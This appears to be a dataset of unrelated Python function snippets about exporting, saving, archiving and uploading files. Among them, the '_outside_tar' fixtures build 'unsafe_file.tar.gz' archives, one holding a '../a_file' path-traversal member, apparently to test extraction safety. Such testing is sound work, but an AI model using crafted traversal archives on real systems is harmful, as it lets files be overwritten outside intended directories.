"def test_export(api):\n # upload file to file.io servers\n uploaded_file = api.upload(\n tag='test_file',\n expiry='1d',\n path='tests/test_file.txt'\n )\n\n # check that instance of FileIO has these fields\n assert uploaded_file.link\n assert uploaded_file.key\n assert uploaded_file.tag\n assert uploaded_file.path\n\n # check that the uploaded file was added to uploaded files list\n assert api.show_uploads()\n\n # testing that export works\n api.export('tests/files_data.json')\n\n # check that the exported file exists\n assert path.isfile('tests/files_data.json')\n\n remove('tests/files_data.json')\n\n # testing that export in pkl works\n api.export(out_type='pkl')\n\n # check that the exported file exists\n assert path.isfile('exported.pkl')\n\n remove('exported.pkl')\n\n # testong that export in pkl works\n api.export('tests/exported.pkl')\n\n # check that the exported file exists\n assert path.isfile('tests/exported.pkl')\n\n remove('tests/exported.pkl')\n\n # testing that export in json with default path works\n api.export()\n\n # check that exported file exists\n assert path.isfile('exported.json')\n\n remove('exported.json')\n\n # check that export with provided path works\n api.export('tests/exporte.d.pkl', out_type='json')\n\n # testing that export works\n assert path.isfile('tests/exporte.d.pkl.json')\n\n remove('tests/exporte.d.pkl.json')\n\n # check that export works correctly with strange path\n api.export('tests/t.e.s.t.p.k.l', out_type='pkl')\n\n # testing that export works\n assert path.isfile('tests/t.e.s.t.p.k.l.pkl')\n\n remove('tests/t.e.s.t.p.k.l.pkl')",
"def _outside_tar2(self):\r\n outside_tar = self.unsafe_common_dir / \"unsafe_file.tar.gz\"\r\n with tarfile.open(outside_tar, \"w:gz\") as tar:\r\n tar.addfile(tarfile.TarInfo(str(self.unsafe_common_dir / \"../a_file\")))\r\n\r\n return outside_tar",
"def export_bom(self):\n path = self.export_dir.joinpath(self.partcode).joinpath('bom.xlsx')\n bom = self.doc.ComponentDefinition.BOM\n bom.StructuredViewFirstLevelOnly = False\n bom.StructuredViewEnabled = True\n bom.BOMViews.Item(\"Structured\").Export(path, 74498)",
"def transfer(file_obj):",
"def do_bagit_export(assets, export_base_dir, export_filename_base):\n\n # These assets should already be in the correct order - by item, seequence\n for asset in assets:\n asset_id = get_original_asset_id(asset.download_url)\n logger.debug(\"Exporting asset %s into %s\", asset_id, export_base_dir)\n\n asset_id = asset_id.replace(\":\", \"/\")\n asset_path, asset_filename = os.path.split(asset_id)\n\n asset_dest_path = os.path.join(export_base_dir, asset_path)\n os.makedirs(asset_dest_path, exist_ok=True)\n\n # Build a transcription output text file for each asset\n asset_text_output_path = os.path.join(\n asset_dest_path, \"%s.txt\" % asset_filename\n )\n\n if asset.latest_transcription:\n # Write the asset level transcription file\n with open(asset_text_output_path, \"w\") as f:\n f.write(asset.latest_transcription)\n\n write_distinct_asset_resource_file(assets, export_base_dir)\n\n # Turn Structure into bagit format\n bagit.make_bag(\n export_base_dir,\n {\n \"Content-Access\": \"web\",\n \"Content-Custodian\": \"dcms\",\n \"Content-Process\": \"crowdsourced\",\n \"Content-Type\": \"textual\",\n \"LC-Bag-Id\": export_filename_base,\n \"LC-Items\": \"%d transcriptions\" % len(assets),\n \"LC-Project\": \"gdccrowd\",\n \"License-Information\": \"Public domain\",\n },\n )\n\n # Build .zip file of bagit formatted Campaign Folder\n archive_name = export_base_dir\n shutil.make_archive(archive_name, \"zip\", export_base_dir)\n\n export_filename = \"%s.zip\" % export_filename_base\n\n # Upload zip to S3 bucket\n s3_bucket = getattr(settings, \"EXPORT_S3_BUCKET_NAME\", None)\n\n if s3_bucket:\n logger.debug(\"Uploading exported bag to S3 bucket %s\", s3_bucket)\n s3 = boto3.resource(\"s3\")\n s3.Bucket(s3_bucket).upload_file(\n \"%s.zip\" % export_base_dir, \"%s\" % export_filename\n )\n\n return HttpResponseRedirect(\n \"https://%s.s3.amazonaws.com/%s\" % (s3_bucket, export_filename)\n )\n else:\n # Download zip from local storage\n with open(\"%s.zip\" % export_base_dir, \"rb\") as zip_file:\n response = HttpResponse(zip_file, content_type=\"application/zip\")\n response[\"Content-Disposition\"] = \"attachment; filename=%s\" % export_filename\n return response",
"def savefile(self, x, o):\n self.sep('save')\n with open(o, 'w') as f:\n f.write(x)\n sys.exit('all done (%s bytes).. saved as %s' % (len(x), o))",
"def export(self):\n memento = self.create_memento()\n try:\n f = open(\"story.txt\", \"w\")\n try:\n f.write(memento.__str__())\n finally:\n f.close()\n except IOError:\n print 'IOError while exporting story!'",
"def export(fileName, result):\n with open(fileName, 'a') as output:\n output.write(result)",
"def saveAs( self, filename ):\r\n filename = uno.systemPathToFileUrl( os.path.abspath( filename ) )\r\n #filterlist: http://wiki.services.openoffice.org/wiki/Framework/Article/Filter/FilterList_OOo_3_0\r\n exportFilter = self._getExportFilter( filename )\r\n props = exportFilter, \r\n #storeToURL: #http://codesnippets.services.openoffice.org/Office/Office.ConvertDocuments.snip\r\n self.oodocument.storeToURL( filename, props )",
"def export(ctx):\n LOG.info(\"Running scout export\")",
"def master_archive(f, e):\n template = e.get_template(TEMPLATES['archive'])\n write_file(\"archives.html\", template.render(entries=f))",
"def exportData(self):\n self.fileName = QtGui.QFileDialog.getSaveFileName(self, self.tr(\"Save Data\"), \"\", \n self.tr('Atom Positions (*.pdb)'))\n if not self.fileName.isEmpty():\n self.setCursor(QtCore.Qt.WaitCursor)\n selectedChain = self.main_chain\n PDBstring = selectedChain.toPDB( CAlphaPlaceholders=False)\n F = open(self.fileName, 'w')\n F.write(PDBstring)\n F.close()\n self.dirty = False\n self.setCursor(QtCore.Qt.ArrowCursor)",
"def _decompress_tarball(*, in_fileobj, out_fileobj):\n with tarfile.open(fileobj=in_fileobj, mode=\"r\") as it, tarfile.open(\n fileobj=out_fileobj, mode=\"w|\"\n ) as ot:\n for member in it.getmembers():\n extracted = it.extractfile(member)\n ot.addfile(member, extracted)",
"def filemenu_Export(self):\n line_dict = {}\n for line in self.lines.values():\n for name, arr in line.to_mat().items():\n line_dict[name] = arr\n fileTypes = [(\"MATLAB file\",\"*.mat\"), (\"NumPy file\",\"*.npz\")]\n options = {}\n options['initialdir'] = os.path.expanduser('~')\n options['filetypes'] = fileTypes\n options['parent'] = self.master\n filename = filedialog.asksaveasfilename(**options)\n if filename:\n _, ext = os.path.splitext(filename)\n if ext == \".mat\":\n sio.savemat(filename, line_dict)\n elif ext == \".npz\":\n np.savez(filename, lines=line_dict)",
"def write_to_file_obj(self, dir, soup_obj):\n\t\tif not os.path.exists(dir):\n\t\t\twith open(dir, 'a') as f:\n\t\t\t\tfor obj in soup_obj:\n\t\t\t\t\t#print(verse.text)\n\t\t\t\t\tf.write(obj.text)\n\t\t\t\tf.write('\\n') # last line missing line break",
"def save(self, output, data):",
"def _outside_tar(self):\r\n outside_tar = self.unsafe_common_dir / \"unsafe_file.tar.gz\"\r\n with tarfile.open(outside_tar, \"w:gz\") as tar:\r\n tar.addfile(tarfile.TarInfo(str(self.content_dir / \"a_file\")))\r\n\r\n return outside_tar",
"def test_download_to_file(req, tmpdir):\n req.get(ENTREZ_URL, text='This works.')\n outdir = tmpdir.mkdir('outdir')\n filename = outdir.join('foo')\n expected = outdir.join('foo.gbk')\n config = core.Config(molecule='nucleotide', verbose=False)\n\n core.download_to_file('FOO', config, filename=filename)\n\n assert expected.check()",
"def write_object_file_to_file(self, file_name):\n with open(file_name, 'wb+') as file:\n file.write(self.object_file.to_binary_array())",
"def write_imp_ASCII(DT, lat_lon_r, BX, BY, BZ, Label,\n olat_olon_or, obsX, obsY, obsZ, obsInc, obsID,\n filename='impOut.zip'):\n\n# def write_antti(DT, Lat, Lon, BX, BY, BZ, Label,\n# obsLat, obsLon, obsInc, obsID,\n# dt_file = 'DateTime.txt.gz',\n# location_file = 'LatLon.txt.gz',\n# bx_file = 'BX.txt.gz',\n# by_file = 'BY.txt.gz',\n# bz_file = 'BZ.txt.gz',\n# station_file = 'Stations.txt.gz'):\n\n # unpack former tuple arguments (see PEP-3113)\n Lat, Lon, Rad = lat_lon_r\n obsLat, obsLon, obsRad = olat_olon_or\n\n # create a temporary directory\n tmpDir = tempfile.mkdtemp()\n\n # set filenames\n dt_file = os.path.join(tmpDir, 'DateTime.txt')\n location_file = os.path.join(tmpDir, 'LatLon.txt')\n bx_file = os.path.join(tmpDir, 'BX.txt')\n by_file = os.path.join(tmpDir, 'BY.txt')\n bz_file = os.path.join(tmpDir, 'BZ.txt')\n obx_file = os.path.join(tmpDir, 'obsBX.txt')\n oby_file = os.path.join(tmpDir, 'obsBY.txt')\n obz_file = os.path.join(tmpDir, 'obsBZ.txt')\n station_file = os.path.join(tmpDir, 'Stations.txt')\n\n # write out ASCII files\n _write_antti_datetime(DT, dt_file)\n _write_antti_location(Lat, Lon, Rad, Label, location_file)\n _write_antti_component(BX, 'X (northward) component', bx_file)\n _write_antti_component(BY, 'Y (eastward) component', by_file)\n _write_antti_component(BZ, 'Z (downward) component', bz_file)\n _write_antti_stations(obsLat, obsLon, obsRad, obsInc, obsID, station_file)\n\n # not a part of original ASCII format, but included for completeness\n _write_antti_component(obsX, 'observed X (northward) component', obx_file)\n _write_antti_component(obsY, 'observed Y (eastward) component', oby_file)\n _write_antti_component(obsZ, 'observed Z (downward) component', obz_file)\n\n # open up output zip file\n with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as outZip:\n outZip.write(dt_file, os.path.basename(dt_file))\n outZip.write(location_file, os.path.basename(location_file))\n outZip.write(bx_file, os.path.basename(bx_file))\n outZip.write(by_file, os.path.basename(by_file))\n outZip.write(bz_file, os.path.basename(bz_file))\n outZip.write(obx_file, os.path.basename(obx_file))\n outZip.write(oby_file, os.path.basename(oby_file))\n outZip.write(obz_file, os.path.basename(obz_file))\n outZip.write(station_file, os.path.basename(station_file))\n\n shutil.rmtree(tmpDir)",
"def save_object(obj, filename):\n\n result = pickle.dumps(obj)\n with gzip.GzipFile(filename, 'wb') as dest: dest.write(result)\n dest.close()",
"def export(request, slug):\n show = Show.objects.get(slug=slug)\n response = HttpResponse(show.data_file.read())\n response['Content-Disposition'] = f'attachment; filename={slug}.json'\n\n return response",
"def test_export_targz(self):\r\n resp = self.client.get(self.url, HTTP_ACCEPT='application/x-tgz')\r\n self._verify_export_succeeded(resp)",
"def pickle_to_file(obj, path):\n pickle.dump(obj, open(path, 'wb'))",
"def to_file(self, file_io):\n pickle.dump(self.__object, file_io)",
"def object_export(request, simulation, object_name):\n query = get_query(object_name, simulation)\n # To avoid conflict if two users export a file at the same time, we\n # generate a random name for the export file.\n seed = np.random.randint(10000)\n filename = '{0}/website_files/exports/{1}.tsv'.format(settings.BASE_DIR,\n seed)\n with codecs.open(filename, 'w', encoding='utf8') as f:\n if object_name == 'centroid':\n fields = ['id', 'name', 'x', 'y', 'db_id']\n elif object_name == 'crossing':\n fields = ['id', 'name', 'x', 'y', 'db_id']\n elif object_name == 'link':\n fields = ['id', 'name', 'origin', 'destination', 'lanes', 'length',\n 'speed', 'capacity', 'vdf']\n elif object_name == 'function':\n fields = ['id', 'expression']\n writer = csv.writer(f, delimiter='\\t')\n if object_name in ('centroid', 'crossing'):\n writer.writerow(['id', 'name', 'x', 'y', 'db_id'])\n values = query.values_list('user_id', 'name', 'x', 'y', 'id')\n elif object_name == 'function':\n writer.writerow(['id', 'name', 'expression'])\n values = query.values_list('user_id', 'name', 'expression')\n elif object_name == 'link':\n writer.writerow(['id', 'name', 'lanes', 'length', 'speed',\n 'capacity', 'function', 'origin', 'destination'])\n values = query.values_list('user_id', 'name', 'lanes', 'length',\n 'speed', 'capacity', 'vdf__user_id')\n # Origin and destination id must be converted to user_id.\n centroids = get_query('centroid', simulation)\n crossings = get_query('crossing', simulation)\n ids = list(centroids.values_list('id', 'user_id'))\n ids += list(crossings.values_list('id', 'user_id'))\n # Map id of nodes to their user_id.\n id_mapping = dict(ids)\n origins = query.values_list('origin', flat=True)\n origins = np.array([id_mapping[n] for n in origins])\n destinations = query.values_list('destination', flat=True)\n destinations = np.array([id_mapping[n] for n in destinations])\n # Add origin and destination user ids to the values array.\n origins = np.transpose([origins])\n destinations = np.transpose([destinations])\n values = np.hstack([values, origins, destinations])\n writer.writerows(values)\n with codecs.open(filename, 'r', encoding='utf8') as f:\n # Build a response to send a file.\n response = HttpResponse(f.read())\n response['content_type'] = 'text/tab-separated-values'\n response['Content-Disposition'] = \\\n 'attachement; filename={}.tsv'.format(metro_to_user(object_name))\n # We delete the export file to save disk space.\n os.remove(filename)\n return response",
"def export_file(self, hash, export_path):\n if os.path.exists(export_path):\n raise StashError('File exists.')\n source = open(self.tree.find(hash), 'rb')\n target = open(export_path, 'wb')\n while True:\n block = source.read(8192)\n if not block:\n break\n target.write(block)\n source.close()\n target.close()",
"def archive_log(self, f_in, filename):\n if not os.path.isdir('archived'):\n os.makedirs('archived')\n f_out = gzip.open('archived/'+filename+'.gz', 'wb')\n f_out.writelines(f_in)\n f_out.close()\n f_in.close()",
"def save_file(obj, file_path):\n with gzip.open(file_path, \"wb\") as fp:\n fp.write(json.dumps(obj).encode('utf-8'))",
"def archive_backup(self):\n\n # Archiving the Training script\n shutil.copyfile(self.script_path, self.save_path + '/0-' + os.path.basename(self.script_path))\n os.chmod(self.save_path + '/0-' + os.path.basename(self.script_path), 0o755)\n # Archiving the src folder\n pkg_path = os.path.dirname(arch_src)\n backup_path = os.path.join(self.save_path, 'src_backup')\n shutil.make_archive(backup_path, 'gztar', pkg_path)\n\n # Archiving the Environment Info\n env_info = collect_env.get_pretty_env_info()\n with open(self.save_path + '/env_info.txt', 'w') as f:\n f.write(env_info)",
"def export(self):\n\t\tif ( self.saveFileStr.get() not in self.saveDefault ):\n\t\t\t# Set the tempo\n\t\t\ttempoObject = tempo.MetronomeMark( None, \n\t\t\t\t\t\t\t\t\t\t\t\tint(self.tempo.get()), \n\t\t\t\t\t\t\t\t\t\t\t\tnote.QuarterNote() )\n\t\t\tself.transcribedPart.insert(tempoObject)\n\t\t\t\n\t\t\t# Write to disk\n\t\t\tsuccess = self.transcribedPart.write(fp=self.saveFile)\n\t\t\tif ( success ):\n\t\t\t\tsaveMsg = \"Your file has been saved to %s.\" % success\n\t\t\t\ttkMessageBox.showinfo(\"File saved!\", saveMsg )\n\t\telif ( self.saveFileStr.get() == \"\" ):\n\t\t\tself.saveFileStr.set(self.saveDefault)\t\t\n\t\t\tpass\n\t\telse:\n\t\t\t# Don't have a save location... should get that\n\t\t\tself.getSavePath()\n\t\t\tself.export()",
"def __init__(self, ase):\n self.bin = open(ase, 'wb')",
"def step_3b(browser):\n xml_file = '../../src/imio.project.pst/src/imio/project/pst/model/PST_eComptes_Export_201805V1.xsd'\n # select xml file\n file_field = browser.find(u'Document XML exporté depuis eComptes')\n with open(xml_file, 'r') as f:\n file_field.set('value', (f.read(), 'ecomptes_pst.xml'))\n # import xml file\n browser.find_button_by_label('Importer').click()\n # write browser contents\n # with open('browser_contents', 'w') as f:\n # f.write(browser.contents)",
"def save_to(self, f: BinaryIO):\n raise NotImplementedError",
"def write(self, object, content_type, to_file):\n return to_file",
"def put(self, obj):\n\n if obj is None:\n return\n\n assert os.path.exists(obj), f'path {obj} does not exist.'\n\n return shutil.make_archive(obj, 'tar', obj)",
"def zoo_import(name, head=''):\n net = gz.get_model(name, pretrained=True)\n export_block(head + name, net, preprocess=True)",
"def __gitCreateArchive(self):\n self.vcs.gitCreateArchive(self.project.getProjectPath())",
"def write_pickle_object_to_file(self, inpobj):\n with gzip.open('%s.tmp' % self.pickle_file, 'wb') as pkl_file:\n pickle.dump(inpobj, pkl_file, pickle.HIGHEST_PROTOCOL)\n run_command('mv %s.tmp %s' % (self.pickle_file, self.pickle_file))\n return True",
"def save2File(self, contents, filename):\n self.setup()\n fullpath = os.path.join(self.output_path, filename)\n f = open(fullpath, 'w')\n f.write(contents) # python will convert \\n to os.linesep\n f.close() # you can omit in most cases as the destructor will call it\n url = \"file://\" + fullpath\n return url",
"def testArchiveExport(self):\n\n archive = alembic.Abc.OArchive(\"iterator.abc\")\n for i in range(3):\n child = alembic.Abc.OObject(archive.getTop(), \"childObj\" + str(i))\n for j in range(3):\n gchild = alembic.Abc.OObject(child, \"grandChild\" + str(j))\n for k in range(3):\n cp = alembic.Abc.OCompoundProperty(gchild.getProperties(), \"prop\" + str(k))\n sp = alembic.Abc.OStringProperty(cp, \"scalar\")\n sp.setValue(\"a\")\n sp.setValue(\"b\")\n sp.setValue(\"c\")\n ap = alembic.Abc.OStringArrayProperty(cp, \"array\")\n stra = imath.StringArray(3)\n stra[0] = 'a'\n stra[1] = 'b'\n stra[2] = 'c'\n ap.setValue(stra)\n strb = imath.StringArray(2)\n strb[0] = 'd'\n strb[1] = 'e'\n ap.setValue(strb)\n strc = imath.StringArray(1)\n strc[0] = 'f'\n ap.setValue(strc)",
"def write_body_in_gz_file(self):\r\n if self.arguments['--out']:\r\n self.file = gzip.open(self.arguments['--out'] + '.gz', \"a+b\")\r\n for list_item in self.list_of_body_objects:\r\n self.file.write(list_item.line.encode('utf-8'))\r\n self.file.close()\r\n else:\r\n for list_item in self.list_of_body_objects:\r\n print(list_item.line.encode('utf-8'))\r\n\r\n self.file.close()",
"def exportModuleToFile(self, exportData):\n calcEngine = CalcEngine.factory(self.client_session)\n file_path = join(settings.MEDIA_ROOT, 'tmp', f'{exportData.moduleId}.ppl')\n if exportData.exportType != \"1\":\n storage = FileSystemStorage(\n join(settings.MEDIA_ROOT, 'models'))\n currentPath = self.client_session.modelInfo.uri\n folderPath = currentPath[:currentPath.rfind(os.path.sep)+1]\n file_path = join(\n storage.base_location, folderPath, f'{exportData.moduleId}.ppl')\n response = calcEngine.exportModule(exportData.moduleId, file_path)\n if response == 1:\n return open(file_path, 'rb'), file_path[file_path.rfind(os.path.sep)+1:]\n raise exceptions.NotAcceptable(\"Engine couldn't create file\")",
"def _cmd_export_nbo(args):\n cnarr = read_cna(args.filename)\n varr = load_het_snps(\n args.vcf,\n args.sample_id,\n args.normal_id,\n args.min_variant_depth,\n args.zygosity_freq,\n )\n table = export.export_nexus_ogt(cnarr, varr, args.min_weight)\n write_dataframe(args.output, table)",
"async def export(export_info: ExportDTO, background_tasks: BackgroundTasks):\n areas = get_areas_to_export(export_info)\n cameras = get_cameras_to_export(export_info, areas)\n temp_dir = tempfile.mkdtemp()\n export_filename = f\"export-{date.today()}.zip\"\n zip_path = os.path.join(temp_dir, export_filename)\n with ZipFile(zip_path, 'w', compression=ZIP_DEFLATED) as export_zip:\n for (cam_id, name) in cameras:\n export_camera_data_into_file(export_info, cam_id, name, export_zip)\n for (area_id, name) in areas:\n export_area_data_into_file(export_info, area_id, name, export_zip)\n background_tasks.add_task(clean_up_file, temp_dir)\n return FileResponse(zip_path, filename=export_filename)",
"def store(self, filename):",
"def exportFlatNode(self, exportData):\n file_path = join(\n settings.MEDIA_ROOT, 'tmp', f'{exportData.nodeId}.{exportData.fileFormat.lower()}')\n identifier = self.getNodeProperties(\n exportData.nodeId, [{\"name\": \"identifier\", \"value\": \"\"}])\n original = identifier['properties'][0]['value']\n calcEngine = CalcEngine.factory(self.client_session)\n response = calcEngine.exportFlatNode(\n original,\n exportData.numberFormat,\n exportData.columnFormat,\n file_path\n )\n if response == 1:\n if exportData.compressed == \"1\":\n temp = tempfile.SpooledTemporaryFile()\n with zipfile.ZipFile(temp, 'w', zipfile.ZIP_DEFLATED) as zfobj:\n zfobj.write(file_path)\n for zfile in zfobj.filelist:\n zfile.create_system = 0\n temp.seek(0)\n return temp, f'{file_path[file_path.rfind(os.path.sep)+1:file_path.rfind(\".\")]}.zip'\n return open(file_path, 'rb'), file_path[file_path.rfind(os.path.sep)+1:]\n raise exceptions.NotAcceptable(\"Engine couldn't create file\")",
"def object_export_save(simulation, object_name, dir):\n query = get_query(object_name, simulation)\n # To avoid conflict if two users export a file at the same time, we\n # generate a random name for the export file.\n filename = dir + '/' + object_name + 's.tsv'\n\n with codecs.open(filename, 'w', encoding='utf8') as f:\n if object_name == 'centroid':\n filename = dir + '/zones.tsv'\n fields = ['id', 'name', 'x', 'y', 'db_id']\n elif object_name == 'crossing':\n filename = dir + '/Intersections.tsv'\n fields = ['id', 'name', 'x', 'y', 'db_id']\n elif object_name == 'link':\n filename = dir + '/links.tsv'\n fields = ['id', 'name', 'origin', 'destination', 'lanes', 'length',\n 'speed', 'capacity', 'vdf']\n elif object_name == 'function':\n filename = dir + '/functions.tsv'\n fields = ['id', 'expression']\n writer = csv.writer(f, delimiter='\\t')\n if object_name in ('centroid', 'crossing'):\n writer.writerow(['id', 'name', 'x', 'y', 'db_id'])\n values = query.values_list('user_id', 'name', 'x', 'y', 'id')\n elif object_name == 'function':\n writer.writerow(['id', 'name', 'expression'])\n values = query.values_list('user_id', 'name', 'expression')\n elif object_name == 'link':\n writer.writerow(['id', 'name', 'lanes', 'length', 'speed',\n 'capacity', 'function', 'origin', 'destination'])\n values = query.values_list('user_id', 'name', 'lanes', 'length',\n 'speed', 'capacity', 'vdf__user_id')\n # Origin and destination id must be converted to user_id.\n centroids = get_query('centroid', simulation)\n crossings = get_query('crossing', simulation)\n ids = list(centroids.values_list('id', 'user_id'))\n ids += list(crossings.values_list('id', 'user_id'))\n # Map id of nodes to their user_id.\n id_mapping = dict(ids)\n origins = query.values_list('origin', flat=True)\n origins = np.array([id_mapping[n] for n in origins])\n destinations = query.values_list('destination', flat=True)\n destinations = np.array([id_mapping[n] for n in destinations])\n # Add origin and destination user ids to the values array.\n origins = np.transpose([origins])\n destinations = np.transpose([destinations])\n if values:\n values = np.hstack([values, origins, destinations])\n writer.writerows(values)\n\n return filename",
"def package():\n \n hou.hipFile.save()\n currentHip = hou.expandString(hou.hipFile.name())\n\n # create a temp directory we are going to fill with crap\n tempFilePath = tempfile.mkdtemp()\n \n otls = os.path.join(tempFilePath, \"otls\")\n os.mkdir(otls)\n files = os.path.join(tempFilePath, \"files\")\n os.mkdir(files)\n \n # Get all the external references to the hipfile\n fileOnDisk = hou.fileReferences()\n\n # loop and do what comes natural.\n for _file in fileOnDisk:\n\n parm = _file[0]\n filepath = _file[1]\n \n # if its a otl we need to store it.\n if filepath.endswith(\".otl\"):\n \n shutil.copy(hou.expandString(filepath), otls)\n \n else:\n \n if not os.path.isfile(hou.expandString(filepath)): \n \n continue\n \n # create a directory in files and save 1 file to that location\n tmpFileName = os.path.basename(hou.expandString(filepath))\n tmpFileDir = os.path.basename(os.path.dirname(hou.expandString(filepath)))\n path = os.path.join(files, tmpFileDir)\n \n if not os.path.isdir(path):\n \n os.mkdir(path)\n\n shutil.copy(hou.expandString(filepath), os.path.join(path, os.path.basename(hou.expandString(filepath))))\n\n try:\n \n if not parm.node().isLocked():\n \n parm.set(os.path.join(path.replace(tempFilePath, \"$HIP\"), tmpFileName))\n \n except hou.PermissionError: \n \n logging.warning(\"Error hardening parm :\" + str(parm.name()) + \"on node \" +parm.node().path())\n\n hou.hipFile.save(os.path.join(tempFilePath, os.path.basename(hou.expandString(hou.hipFile.name()))))\n # Load the source hipfile\n hou.hipFile.load(currentHip)\n \n # create a zipfile and package everything. then copy it to the home.\n zipfileLoc = zipdir(tempFilePath)\n shutil.move(zipfileLoc, os.path.join(hou.expandString(\"~\"), \"package.zip\"))\n shutil.rmtree(tempFilePath)",
"def _export_file(self, tmp_file, file_name):\n # Export the file\n archive_name = file_name + \".zip\"\n # switch into the temporary working directory to use relative path for zip\n os.chdir(self.temp_file_path)\n\n # Compression\n compressed_output_path = os.path.join(self.temp_file_path, archive_name)\n\n executable = \"/usr/bin/zip\"\n args = [\"-r\", archive_name, tmp_file]\n\n p = Process(exec_type=\"exec\",\n executable=executable,\n executable_params=args,\n stdin_source=None)\n\n self._update_num_of_steps(1)\n self._run_process(p)\n\n return archive_name, compressed_output_path",
"def save_obj(obj, path ):\n with open(path, 'wb') as f:\n pickle.dump(obj, f)",
"def save_to_fileobj(self, fileobj):\n writetags(fileobj, self.__dxftags__(), self.ENCODING)",
"def export(self, location):\n temp_dir = tempfile.mkdtemp('-export', 'pip-')\n self.unpack(temp_dir)\n try:\n call_subprocess(\n [self.cmd, 'archive', location],\n filter_stdout=self._filter, show_stdout=False, cwd=temp_dir)\n finally:\n rmtree(temp_dir)",
"def export(file_path):\n proxy_factory.export_proxies(open(file_path, 'w'))",
"def _pack_ex(file, names, cwd, implementor=None):\n assert isdir(cwd)\n if exists(file):\n console.rm(file)\n if not implementor: implementor = GzipTarredFile\n \n with console.cd(cwd):\n relnames = [relpath(name, cwd) for name in names]\n implementor.pack(relnames, file)\n return file",
"def export_to_file(self, fp, *args, **kwargs):\n with open(fp, 'w') as fh:\n self._to_str(fh)",
"def write_to_file(self, filename):\n self.octree.write(str.encode(filename))\n print(\"Save octomap to \"+filename)",
"def save_tar(self, target_dir):\n # type: (Text) -> None\n raise NotImplementedError(\"\")",
"def export_model(self, save_path: str, save_format: Optional[str] = None) -> None:",
"def write_to_file(name, obj):\n\n print 'writing structures to pickle'\n print '----------------------------'\n\n path = os.getcwd() + '/pickles/' + name + '.pkl'\n file = open(path, 'wb')\n pickle.dump(obj, file)\n file.close()",
"def make_zip_file(self, post_content):\n file_path, file_url = self.save_file(post_content['shortcode'] + '.zip', self.make_empty_zip())\n with ZipFile(file_path, 'w') as zipf:\n if post_content['igtv'] is True:\n zipf.writestr('igtv_link.txt', post_content['urls'][0][2])\n else:\n for url in post_content['urls']:\n zipf.writestr(self.get_content_name(url[2]), requests.get(url[2]).content)\n\n if 'text' in post_content:\n zipf.writestr('caption.txt', post_content['text'])\n return file_url",
"def export_file_dto(self, active_model, objs=[], type=''):\n dto_parser = DtoParser()\n objs2 = []\n for obj in objs:\n objs2 += dto_parser.parseJointPromotion(obj)\n\n doc_type_obj = self.env[\"edi.doc.type\"]\n doc_obj = self.env[\"edi.doc\"]\n doc_type = doc_type_obj.search([(\"code\", '=', \"dto\")])[0]\n last_dto_file = doc_obj.search([(\"doc_type\", '=', doc_type.id)],\n order=\"date desc\", limit=1)\n if last_dto_file:\n count = last_dto_file.count + 1\n else:\n count = 1\n\n tmp_name = \"export_dto.txt\"\n file_len = len(objs2)\n filename = \"%sDTO%s.%s\" % (self.env.user.company_id.frigo_code,\n str(file_len).zfill(4),\n str(count).zfill(4))\n templates_path = self.addons_path('frigo_edi') + os.sep + 'wizard' + \\\n os.sep + 'templates' + os.sep\n mylookup = TemplateLookup(input_encoding='utf-8',\n output_encoding='utf-8',\n encoding_errors='replace')\n tmp = Template(filename=templates_path + tmp_name,\n lookup=mylookup, default_filters=['decode.utf8'])\n\n doc = tmp.render_unicode(o=objs2, type_=type, datetime=datetime,\n user=self.env.user).encode('utf-8', 'replace')\n file_name = self[0].service_id.output_path + os.sep + filename\n f = file(file_name, 'w')\n f.write(doc)\n f.close()\n file_obj = self.create_doc(filename, file_name, doc_type)\n file_obj.count = count",
"def do_export(args):\n outfile_name = args.outfile_name.split('.')\n outfile_ext = 'txt'\n if len(outfile_name) > 1:\n (outfile_name, outfile_ext) = outfile_name\n else:\n outfile_name = outfile_name[0]\n\n secret = subprocess.Popen(['gpg', '--export-secret-key', args.keyid], stdout=subprocess.PIPE)\n paperkey = subprocess.check_output(['paperkey', '--output-type', 'raw'], stdin=secret.stdout)\n base64str = base64.b64encode(paperkey)\n chunks = chunk_up(base64str, args.numfiles)\n\n for i, chunk in enumerate(chunks):\n if args.png:\n (_, _, image) = qrencode.encode_scaled(chunk, int(args.size))\n image.save('%s%d.png' % (outfile_name, i+1), 'PNG')\n if args.base64:\n with open('%s%d.%s' % (outfile_name, i+1, outfile_ext), 'wb') as txt_file:\n txt_file.write(chunk)",
"def bmark_export(request):\r\n username = request.user.username\r\n\r\n bmark_list = BmarkMgr.user_dump(username)\r\n # log that the user exported this\r\n BmarkLog.export(username, username)\r\n\r\n def build_bmark(bmark):\r\n d = dict(bmark)\r\n d['hashed'] = dict(bmark.hashed)\r\n return _api_response(request, d)\r\n\r\n return _api_response(request, {\r\n 'bmarks': [build_bmark(bmark) for bmark in bmark_list],\r\n 'count': len(bmark_list),\r\n 'date': str(datetime.utcnow())\r\n })",
"def save_to_file(psbt, filename):\n raw = psbt.serialize()\n # convert to base64\n b64_psbt = b2a_base64(raw)\n # somehow b2a ends with \\n...\n if b64_psbt[-1:] == b\"\\n\":\n b64_psbt = b64_psbt[:-1]\n # print\n new_psbt = b64_psbt.decode('utf-8')\n print(\"Creating\", filename)\n with open(filename, 'wt') as outfile:\n print(new_psbt, file=outfile)",
"def create_backup_file(self, source_dir, archive_file):\n tar_file = tarfile.open(archive_file, 'w|gz')\n try:\n tar_file.add(source_dir)\n finally:\n tar_file.close()",
"def save(self):\n logging.debug(\"environment save entered\")\n filename = \"index.json\"\n content_dict = {}\n for fpname in self.footprints:\n # for now, just using the patteern ${footprint_name}-metadata for the name \n content_dict[fpname] = fpname\n content = json.dumps(content_dict)\n index = cf.store_object(self.container, filename, content) \n return True",
"def export(self, f, **kwargs):\n from .. import export\n\n return export.utils.package_export(f, self, **kwargs)",
"def to_file(self, path, family_root=\".edocache\"):\n\n path = Path(path)\n path.mkdir(exist_ok=True, parents=True)\n\n self.dataframe.to_csv(path / \"main.csv\", index=False)\n\n meta_dicts = []\n for pdf in self.metadata:\n pdf.family.save(family_root)\n meta_dicts.append(pdf.to_dict())\n\n with open(path / \"main.meta\", \"w\") as meta:\n json.dump(meta_dicts, meta)\n\n with open(path / \"main.state\", \"wb\") as state:\n pickle.dump(\n self.random_state, state, protocol=pickle.HIGHEST_PROTOCOL\n )\n\n return path",
"def import_bento_(bento_path: str) -> None: # type: ignore (not accessed)\n bento = import_bento(bento_path)\n logger.info(\"%s imported.\", bento)",
"def save_object(obj, file_name):\n file_name = osp.abspath(file_name)\n with open(file_name, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)",
